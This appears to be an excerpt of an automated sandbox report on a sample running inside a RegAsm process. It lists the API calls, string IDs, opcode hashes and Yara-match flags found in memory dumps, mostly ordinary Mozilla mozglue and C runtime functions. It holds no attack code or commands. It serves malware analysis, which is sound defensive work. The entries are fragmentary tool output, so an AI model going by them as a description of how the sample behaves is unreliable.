                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F3E6
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4D5
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: __CxxThrowException@8.LIBCMT ref: 0041F4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4FB
                                                                                                                                                                                                                                                    • memmove.MSVCRT ref: 0040F41F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • invalid string position, xrefs: 0040F3E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                                                                    • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C713D19
                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C713D6C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6E44B2,6C75E21C,6C75F7F8), ref: 6C6E473E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6E474A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                    • String ID: GetNtLoaderAPI
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
                                                                                                                                                                                                                                                      • Part of subcall function 6C732140: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?), ref: 6C732243
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,00000001,00000000,?,?,?,6C732633,?,?,?), ref: 6C73211D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_
                                                                                                                                                                                                                                                    • String ID: 3&sl$3&sl
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C736E22
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C736E3F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C736E1D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040F3AF
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040F3C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                    • String ID: |nB
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9EEF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                    • String ID: Infinity$NaN
                                                                                                                                                                                                                                                    • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                    • Opcode ID: c1f52bf0e2781d634240acab1be13a1e9b2a9ffde6b6fef88fe9c5ade633e3c0
                                                                                                                                                                                                                                                    • Instruction ID: 064e185aa76c164315e344ac4f493be03cd9db8887338b18f04cd189461d7a10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1f52bf0e2781d634240acab1be13a1e9b2a9ffde6b6fef88fe9c5ade633e3c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0C2B1601749CBDB008F28DA6BBA433B1BB0731DFA00A79C6040BB80DF356556CBC6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0Kql,?,6C714B30,80000000,?,6C714AB7,?,6C6D43CF,?,6C6D42D2), ref: 6C6E6C42
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0Kql,?,6C714B30,80000000,?,6C714AB7,?,6C6D43CF,?,6C6D42D2), ref: 6C6E6C58
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$malloc
                                                                                                                                                                                                                                                    • String ID: 0Kql
                                                                                                                                                                                                                                                    • API String ID: 1967447596-3749716056
                                                                                                                                                                                                                                                    • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                    • Instruction ID: b7d16f6321e6c534d2a7dd2ccbf689db11161b3ca85c47443273f3989840aaba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAE026F1A1A1081A9B08987C9C0956E75C88B1DBA87044A37E933C2BC8FA94E444805D
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C7551C8), ref: 6C73591A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C73592B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C735915
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                                                    • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                                                    • API String ID: 297244470-335682676
                                                                                                                                                                                                                                                    • Opcode ID: ecb2f07d5bbb1429e79ab53c966579be643bd137d0c668330b4932ff57cbb5c2
                                                                                                                                                                                                                                                    • Instruction ID: 48ed9baceea58ed91ceab1f7cfeca5267931be4f320f880747a03a8794cc603d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb2f07d5bbb1429e79ab53c966579be643bd137d0c668330b4932ff57cbb5c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59E0DF30204254FBCB004B68EA087457FF89B13369F948524E46C83AC2CBB6A8408391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F860), ref: 6C6E385C
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F860,?), ref: 6C6E3871
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                    • String ID: ,ul
                                                                                                                                                                                                                                                    • API String ID: 17069307-4126386095
                                                                                                                                                                                                                                                    • Opcode ID: 617b208a675b512cdc688df42854a336b6fd3e6a127bebbd86fc5214231dcea1
                                                                                                                                                                                                                                                    • Instruction ID: 2140f31e118b3b6ef5154b56b246aeeb9fb94aee2a258a666ed4e0f5abc93f97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617b208a675b512cdc688df42854a336b6fd3e6a127bebbd86fc5214231dcea1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67E02631A0AB1C9787029FA7850259B3B78EF0B7903C4802AF40E17E10CF30F18087C9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C6EBEE3
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C6EBEF5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                                                    • String ID: cryptbase.dll
                                                                                                                                                                                                                                                    • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                                                    • Opcode ID: fe6012da9903913275c13e4a460adb5687b85ada534375b26dd0bad1f78cfab0
                                                                                                                                                                                                                                                    • Instruction ID: 1e63a50e7b176ada697a4e14fe8292fb3b64c90c0032fb0b5125186c29145d79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe6012da9903913275c13e4a460adb5687b85ada534375b26dd0bad1f78cfab0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40D0A731385208E6C6006B608D05B39377CA746355F50C031F30544851CBB1A421CF48
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C,?,?,?,?,?), ref: 6C6D510A
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C,?,?,?,?,?), ref: 6C6D5167
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C6D5196
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C), ref: 6C6D5234
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                                    • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                    • Instruction ID: 7cb8845f3562b128add53dff6da1e071aa5d9a077a4512b7eaad74ce4b906a0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1491A075505616CFCB14CF08C890A56BBA2FF8A318B2A858CDC595BB15D771FC46CBE0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C710918
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C7109A6
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC,?,00000000), ref: 6C7109F3
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C710ACB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 1847ade8daef700faeca9525d36f5579e55d5716c4675572e5c6062b20612062
                                                                                                                                                                                                                                                    • Instruction ID: f75b4a0c506c9ba419e42e56fe70e4cc9714ea713522b185daa3db502a2da446
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1847ade8daef700faeca9525d36f5579e55d5716c4675572e5c6062b20612062
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99512736B096588FEB089B25C61462533F5FB82B24B6D453AD96597F80DF30FC2187C0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B628
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B67D
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B708
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C72B127,?,?,?,?,?,?,?,?), ref: 6C72B74D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: ec1987fabf263c55e8b35745ecea245c3d97a3e4d6239c868a4ad828244a8104
                                                                                                                                                                                                                                                    • Instruction ID: be09d6bf6d318f2ea53590a59784b58f27f27b331e0d91746c7745567f2341d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1987fabf263c55e8b35745ecea245c3d97a3e4d6239c868a4ad828244a8104
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D51C071A052168FDB14CF28CA84B5EB7B5FF49305F59852EC89BAB701DB35B804CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C71FF2A), ref: 6C72DFFD
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C71FF2A), ref: 6C72E04A
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C71FF2A), ref: 6C72E0C0
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C71FF2A), ref: 6C72E0FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: 1f88d3d4746139ce9981a157147c545ebc7c2e6c31dcc75d581d8a120878a950
                                                                                                                                                                                                                                                    • Instruction ID: d40df9c149f45c71f88adaa8abf664d616057997e7f1d18d43e3412dd0840ef5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f88d3d4746139ce9981a157147c545ebc7c2e6c31dcc75d581d8a120878a950
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941D4B160420A8FEB24CF78CA8075EB3B2FB45309F284539D556DB741EB35E905CBA2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C726EAB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C726EFA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C726F1E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C726F5C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
